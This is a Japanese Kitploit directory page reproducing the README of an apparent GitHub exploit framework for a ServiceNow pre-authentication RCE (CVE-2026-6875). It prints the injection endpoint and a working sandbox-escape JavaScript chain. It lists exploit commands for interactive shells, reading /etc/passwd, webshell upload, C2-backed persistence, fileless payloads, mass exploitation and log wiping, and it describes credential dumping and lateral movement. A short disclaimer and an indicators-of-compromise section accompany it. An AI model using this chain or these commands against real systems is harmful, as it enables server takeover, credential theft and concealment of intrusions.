Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-6875-PoC-Exploit — CVE-2026-6875 ServiceNow 事前認証RCEフレームワーク 🔥 JSインジェクション → サンドボックスエスケープ → RCE → Root。機能: --detect、--exec、リバース/インタラクティブシェル、バッチスレッド処理、WAFバイパス、永続化、横展開、資格情報ダンプ、ファイルレス実行、痕跡消去。🛡️ CVSS 9.5 活発に悪用されています。許可された合法的な使用のみ。法律を遵守してください。🔒 | Kitploit
ツール/GitHubGitHub/tc4dy/cve-2026-6875-poc-exploit
特権昇格脆弱性スキャナー永続化メカニズムエクスプロイト横移動ウェブアプリケーション悪用ポストエクスプロイトWAFバイパスペネトレーションテスト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リモートアクセスツール
GitHubtc4dy/cve-2026-6875-poc-exploit

CVE-2026-6875-PoC-Exploit

CVE-2026-6875 ServiceNow 事前認証RCEフレームワーク 🔥 JSインジェクション → サンドボックスエスケープ → RCE → Root。機能: --detect、--exec、リバース/インタラクティブシェル、バッチスレッド処理、WAFバイパス、永続化、横展開、資格情報ダンプ、ファイルレス実行、痕跡消去。🛡️ CVSS 9.5 活発に悪用されています。許可された合法的な使用のみ。法律を遵守してください。🔒

リポジトリを見る
391ヶ月前未レビュー

CVE-2026-6875

CVE-2026-6875 - ServiceNow 事前認証RCEエクスプロイトフレームワーク & PoC検証ツール 🔥

CVE-2026-6875 CVSS 9.5 CISA KEV Python 3.6+

Pre-Auth RCE Sandbox Escape Privesc Windows Ready

ServiceNow AI プラットフォーム — JavaScriptインジェクション → サンドボックスエスケープ → RCE → root権限昇格

エクスプロイトフレームワーク & セーフ検証ツール
許可されたセキュリティテストのみを対象としています。


⚖️ 法的免責事項と責任ある使用

このツールは、教育目的および許可されたペネトレーションテスト専用に提供されています。

著者および貢献者は、本ソフトウェアの誤用または損害について一切の責任を負いません。ユーザーは、テスト前にターゲット所有者から明示的な書面による許可を得ていることを確認する責任を単独で負います。コンピュータシステムへの不正アクセスは、Computer Fraud and Abuse Act(CFAA)および世界中の同様の法律に基づき違法です。

本ソフトウェアを使用することにより、あなたは以下に同意したものとします:

  • 所有している、またはテストする明示的な許可を得ているシステムでのみ使用すること。
  • 該当するすべての地域、州、連邦の法律を遵守すること。
  • 悪意のある、破壊的な、または違法な活動に使用しないこと。

⚠️ 警告: この脆弱性は実環境で活発に悪用されています。不正使用は深刻な法的結果を招く可能性があります。


🔥 脆弱性の概要

CVE-2026-6875 は、ServiceNow AI プラットフォーム(旧 Now Platform)における重大な**認証不要のリモートコード実行(RCE)**脆弱性です。攻撃者はスクリプトサンドボックスを回避し、ServiceNow アプリケーションの権限で任意のシステムコマンドを実行できます。

動作の仕組み:

  1. JavaScriptインジェクション: assessment_thanks.do エンドポイントは sysparm_assessable_type パラメータを受け付けます。値の先頭に javascript: を付けることで、攻撃者は任意のJavaScriptコードを注入できます。

  2. サンドボックスエスケープ: 高度なサンドボックスエスケープガジェット(DiscoveryFunctions.getCacheObjectForTable、AbstractAjaxProcessor、Class.create を連鎖させる)により、JavaScriptサンドボックス制限を解除します。

  3. リモートコード実行: 注入されたJavaコード(java.lang.Runtime.exec() 経由)が ServiceNow アプリケーション権限で実行され、システム全体の完全な侵害が可能になります。

  4. 権限昇格: ポストエクスプロイテーションモジュールは、sudoの設定ミス、SUIDバイナリ、書き込み可能なcronジョブ、カーネルエクスプロイトを利用してrootへの権限昇格を試みます。

主要情報:


🛠️ エクスプロイトフレームワーク (exploit.py)

完全な武器化エクスプロイトは、JavaScriptインジェクションとサンドボックスエスケープを連鎖させてリモートコード実行を実現し、永続化、横展開、資格情報ダンプのための高度なポストエクスプロイテーションモジュールを備えています。

✨ 機能

対話型シェルコマンド


🕵️ セーフ検証ツール (verifier.py)

セーフ検証ツールは、有害なペイロードを実行したりシステムに変更を加えたりすることなく、非侵入型の脆弱性検出を実行します。

✨ 機能


📦 インストールと要件

前提条件

  • Python 3.6+
  • pip(requests ライブラリ用)

依存関係のインストール

root@kitploit:~
pip install requests urllib3

[!NOTE] exploit.py はコア機能に標準ライブラリのみを使用します。requests は --detect 機能、--webhook 通知、およびセーフ検証ツールにのみ必要です。


🚀 使用例

[1] セーフ検証ツール (verifier.py)

root@kitploit:~
# Single target verification
python verifier.py -u 192.168.1.100

# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow

# Mass scan from file
python verifier.py -l targets.txt -o results.json

# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q

# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60

# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"

[2] エクスプロイトフレームワーク (exploit.py)

root@kitploit:~
# Interactive shell on target
python exploit.py -u 192.168.1.100

# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"

# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd

# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect

# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc

# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp

# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444

# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean

# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444

# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"

# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090

# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass

# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow

# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100

# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow

# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls

# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0

🎯 影響を受けるバージョン

⚠️ 重要: ServiceNow Cloud インスタンスは自動的にパッチ適用されます。この脆弱性は主にセルフホスト型のデプロイに影響します。


🧠 技術詳細

1. JavaScriptインジェクション(CVE-2026-6875)

この脆弱性は、sysparm_assessable_type パラメータを受け付ける assessment_thanks.do エンドポイントに存在します。javascript: で始まる値を指定すると、プラットフォームは後続の JavaScript をシステムコンテキスト内で評価します。

脆弱なエンドポイント:

POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')

2. サンドボックスエスケープガジェット

注入されたコードは最初、サンドボックス内に制限されます。しかし、次のチェーンを利用することで:

root@kitploit:~
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
  a,"",DiscoveryFunctions.getFirstValueFromTable(
    a,"",DiscoveryFunctions.getFirstValueFromTable(
      a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);

サンドボックスが回避され、java.lang.Runtime などのJavaクラスへの完全なアクセスが許可されます。

3. ポストエクスプロイテーションモジュール

資格情報のダンプ

.properties、.xml、.conf ファイルからパスワード、APIキー、シークレットを検索します:

  • /opt/ServiceNow/conf/*.xml
  • /var/log/ServiceNow/*.log
  • /etc/passwd, /etc/shadow

永続化

次の方法でバックドアをインストールします:

  • Linux: Cronジョブ(*/5 * * * *)、systemdサービス、SSHキー
  • Windows: スケジュールタスク(schtasks)、レジストリのRunキー

横展開

ローカルサブネット内の他の ServiceNow インスタンスまたは SSH ホストをスキャンし、発見した資格情報を再利用します。

ファイルレス実行

Javaクラスをその場でコンパイルし、ClassLoader を介してロードして、メモリ内で実行します(ディスクへの書き込みなし)。

WAF回避テクニック

  1. 二重URLエンコーディング
  2. JavaScriptコメント({/*comment*/})
  3. Unicodeエスケープ(w の場合は \u0077)
  4. 空白文字の注入
  5. キーワード分割(new の場合は ne\u0077)
  6. テクニックのランダム選択

🔍 侵害指標(IoCs)

ログ分析

ServiceNow ログで以下を検索してください:

  • extraweb_access.log – sysparm_assessable_type に以下を含む /assessment_thanks.do へのリクエスト:
    • javascript:
    • Base64エンコードされた文字列
    • DiscoveryFunctions.getCacheObjectForTable
    • AbstractAjaxProcessor

ファイルシステム

  • /var/tmp/ 内の予期しないファイル(例: shell.jsp、.sh スクリプト)
  • 変更された /etc/passwd、/etc/shadow、または ~/.ssh/authorized_keys
  • 新しい cron ジョブ(crontab -l)
  • 新しい systemd サービス(/etc/systemd/system/)

プロセス

  • 不審なプロセス(/bin/bash -i、nc、curl、wget、python -c)
  • 外部IPアドレスへの予期しないネットワーク接続

ネットワーク

  • ServiceNow サーバーから未承認IPへのアウトバウンド接続
  • 通常ではないポートでのリバースシェル接続

📚 参考情報

  • NVD - CVE-2026-6875
  • ServiceNow セキュリティアドバイザリ (KB3137947)
  • CISA KEV カタログ
  • Searchlight Cyber – 技術解説
  • The Hacker News – 悪用されたServiceNowゼロデイ

🔗 その他のエクスプロイト

[+] CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
https://github.com/tc4dy/CVE-2026-15409-15410-Framework

[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit

[+] CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit

[+] CVE-2026-41940 - cPanel/WHM Authentication Bypass
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit

ツールをダウンロード
AttributeValue
📅 発見日2026年4月1日 (Searchlight Cyber)
⚠️ CVSSスコア9.5(CRITICAL)
📋 CISA KEV2026年7月13日追加
🎯 影響を受ける製品セルフホスト型 ServiceNow AI プラットフォーム
🔄 修正済みバージョンBrazil EA/GA、Australia Patch 2、Zurich Patch 7b/9、Yokohama Patch 12 Hot Fix 1b/13
🔓 認証不要(事前認証)
🌍 実際の悪用実環境での悪用を確認済み(2026年7月)
FeatureDescription
🚀 JavaScriptインジェクションsysparm_assessable_type パラメータを介してペイロードを注入します。
💻 サンドボックスエスケープServiceNow のスクリプトサンドボックスを回避し、任意のJavaコードを実行します。
🔐 対話型シェル複数のコマンドに対応したライブシェルを起動します。
👑 root権限昇格sudoの設定ミス、SUIDバイナリ、cronジョブをチェックします。
📁 ファイル操作Webシェルをアップロードし、base64エンコードでファイルを読み取り/ダウンロードします。
🌐 バッチスキャンスレッド処理(-l フラグ)で複数のターゲットを大量にエクスプロイトします。
🎯 安全な検出非侵入型の脆弱性検証のためのオプションの --detect フラグ。
⚙️ WAF回避WAF/IDSを回避するための組み込みの難読化テクニック(6種)。
🧩 永続化cron/systemd/schtasksバックドアをインストールします。
🔍 横展開ローカルネットワーク内の他の脆弱性ホストをスキャンし、SSH/SSRF伝播を試みます。
🧹 痕跡消去ログ、bash履歴、監査トレイルを削除します。
💾 ファイルレス実行Java ClassLoader を使用し、ディスクに書き込まずにメモリ常駐ペイロードを実行します。
🔌 コールバックサーバーコマンド出力を受信する組み込みHTTPサーバー(オプション)。
📢 Webhook通知結果をカスタムURL(Slack、Discord など)に送信します。
🪟 クロスプラットフォームLinux および Windows ターゲット(cmd.exe / PowerShell)に対応。
🔒 スレッドセーフ並行操作時にロック機構を使用します。
📊 バージョン検出ServiceNow のバージョン(Zurich/Brazil/Australia/Yokohama)を検出します。
CommandDescription
exec <cmd>システムコマンドを実行
upload <local> [remote]ターゲットにWebシェルをアップロード
download <remote>ファイルをダウンロードして内容を表示
privesc権限昇格を試行
reverse <host> <port>リバースシェルを送信
dumpcredServiceNow 設定から資格情報をダンプ
persist <host> <port>永続化をインストール(cron/systemd/schtasks)
lateral横展開を試行
clean痕跡を消去(ログ、履歴)
memory <host> <port>ファイルレスJavaペイロードを実行
exit対話型シェルを終了
FeatureDescription
🔍 ServiceNow検出複数のエンドポイントを介して ServiceNow インスタンスを特定します。
📊 バージョン検出特定の ServiceNow リリースとパッチレベルを検出します。
🧪 JavaScriptインジェクションテスト安全な gs.print() ペイロードを使用してインジェクション脆弱性をテストします。
🔒 サンドボックスエスケープテスト破壊的なコマンドを使用せずにサンドボックスエスケープを検証します。
📈 信頼度スコアリング証拠に基づく信頼度パーセンテージ(85‑95%)を提供します。
📋 JSON出力レポート用に結果をJSON形式でエクスポートします。
🔄 一括スキャンスレッド処理に対応し、複数のターゲットをスキャンします。
🎯 非侵入型システム情報のため、無害な uname -a のみを実行します。
ServiceNow リリース影響を受けるバージョン修正済みバージョン
BrazilEA、GA修正済み(post-GA)
AustraliaPatch 2 より前Patch 2 以降
ZurichPatch 7b、Patch 9 より前Patch 7b、Patch 9 以降
YokohamaPatch 12 Hot Fix 1b より前Patch 12 Hot Fix 1b、Patch 13
その他のリリース不明公式アドバイザリを確認